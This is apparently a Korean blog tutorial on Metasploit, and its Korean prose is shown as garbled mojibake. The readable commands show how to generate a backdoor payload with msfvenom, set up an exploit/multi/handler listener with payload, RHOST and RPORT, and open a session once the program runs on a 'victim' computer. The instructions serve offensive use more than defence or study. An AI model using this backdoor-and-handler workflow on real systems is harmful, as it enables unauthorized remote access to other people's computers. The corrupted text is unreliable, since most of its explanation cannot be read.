์ฃผ์! ๋ชจ๋ ์ ์์ ์ธ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค.
ํ ... ์๋ ์๋ msfpayload ๋ผ๋ ๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํ์ฌ ๋ฐฑ๋์ด๋ ๋ง๋ค์ด ๋ณด๊ณ ํ๋ค.
๊ทธ๋ฌ๋ ๋ฐ๋ผ๊ณ ๋ ํ ์ค๋๋ง์ ์จ์ผํด์ ๋ช ๋ น์ด๋ฅผ ํ๋ msfpayload๊ฐ ์๋ฐ์ฌ,,,
๊ฒ์๊ฒฐ๊ณผ msfvenom ์ผ๋ก ๋ฐ๊ผ๊ธธ๋ ๋ค์ ๊ณต๋ถ๋ฅผ ํ์๋ค.
์ด์ ์ด๋ฅผ ๊ฐ๋จํ ์ฌ์ฉํด๋ณด์!
๋จผ์ ๋ฆฌ์คํธ๋ฅผ ๋ณด๊ธฐ์ํด
1. msfvenom -l
์ด๋ ๊ฒ ๋ฆฌ์คํธ๊ฐ ๋์จ๋ค.
๋ง์ฝ ์๊ธฐ๊ฐ ์ฐ๊ณ ์ถ์ payload๋ฅผ ์ฐพ์๋ค๋ฉด
2. msfvenom -p ์ํ๋ payload -f ํ์ฅ์ > ํ์ผ์ด๋ฆ.ํ์ฅ์
root ํด๋์ ๊ฐ๋ฉด ํ์ผ์ด ์์ฑ๋์ด์๋ค.
์ด์ ํธ๋ค๋ฌ๋ฅผ ํฅํด!!
1. msfconsole
2. use exploit/multi/handler
3. sey payload [payload ๋ช ]
4. set RHOST [payload ๋ง๋ค๋ ๋ฃ์ IP]
5. set RPORT [payload ๋ง๋ค๋ ๋ฃ์ PORT]
6. set ExitOnsession false
7. exploit -j -z
ํผํด์ ์ปดํจํฐ์์ ํ๋ก๊ทธ๋จ์ ์คํ์ํค๋ฉด
์ด๋ ๊ฒ ๋ฌ๋ค
๊ทธํ ์ํฐ
๋ค์ sessions -i 1 ์ ์ ๋ ฅํ๋ฉด
์์ง ์นผ๋ฆฌ์์ ์๋์ฐ 10์ ์ธ์์ ๋ชปํ๋ ๊ฒ ๊ฐ๋ค.
'Metasploit' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
stagefright.py (0) | 2016.02.10 |
---|---|
postgreSQL? (0) | 2015.12.14 |
msf ์ด์ฉํ๊ธฐ // beEF ์ฌ์ฉ๋ฒ (0) | 2015.12.06 |
Arp Spoofing & DNS Spoofing (0) | 2015.12.06 |
msf ์ด์ฉํ๊ธฐ2 (0) | 2015.12.02 |
๋๊ธ